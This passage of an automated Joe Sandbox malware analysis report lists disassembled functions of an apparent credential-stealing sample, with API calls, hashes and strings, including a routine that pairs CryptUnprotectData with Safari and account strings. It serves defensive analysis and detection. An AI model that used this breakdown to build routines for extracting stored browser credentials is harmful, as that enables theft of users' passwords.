                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                              Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 1936579350-0
                                                                                                              • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                              • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                              Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                              Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                              Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                              • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                              • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                              • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                                                                              Non-executed Functions

                                                                                                              Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 3604893535-0
                                                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                              Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1213725291-0
                                                                                                              • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                              • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                              Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                              • free.MSVCRT ref: 00418370
                                                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                              • String ID: OsError 0x%x (%u)
                                                                                                              • API String ID: 2360000266-2664311388
                                                                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                              Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1865533344-0
                                                                                                              • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                              • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                              Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NtdllProc_Window
                                                                                                              • String ID:
                                                                                                              • API String ID: 4255912815-0
                                                                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                              Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                              • memset.MSVCRT ref: 0040265F
                                                                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                              • API String ID: 2929817778-1134094380
                                                                                                              • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                              • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                              Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                                                              • API String ID: 2787044678-1921111777
                                                                                                              • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                              • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                              Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                              • GetDC.USER32 ref: 004140E3
                                                                                                              • wcslen.MSVCRT ref: 00414123
                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                              • _snwprintf.MSVCRT ref: 00414244
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                              • API String ID: 2080319088-3046471546
                                                                                                              • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                              • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                              Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                              • memset.MSVCRT ref: 00413292
                                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                                              • memset.MSVCRT ref: 00413310
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                              Strings
                                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                              • API String ID: 4111938811-1819279800
                                                                                                              • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                              • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                              Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
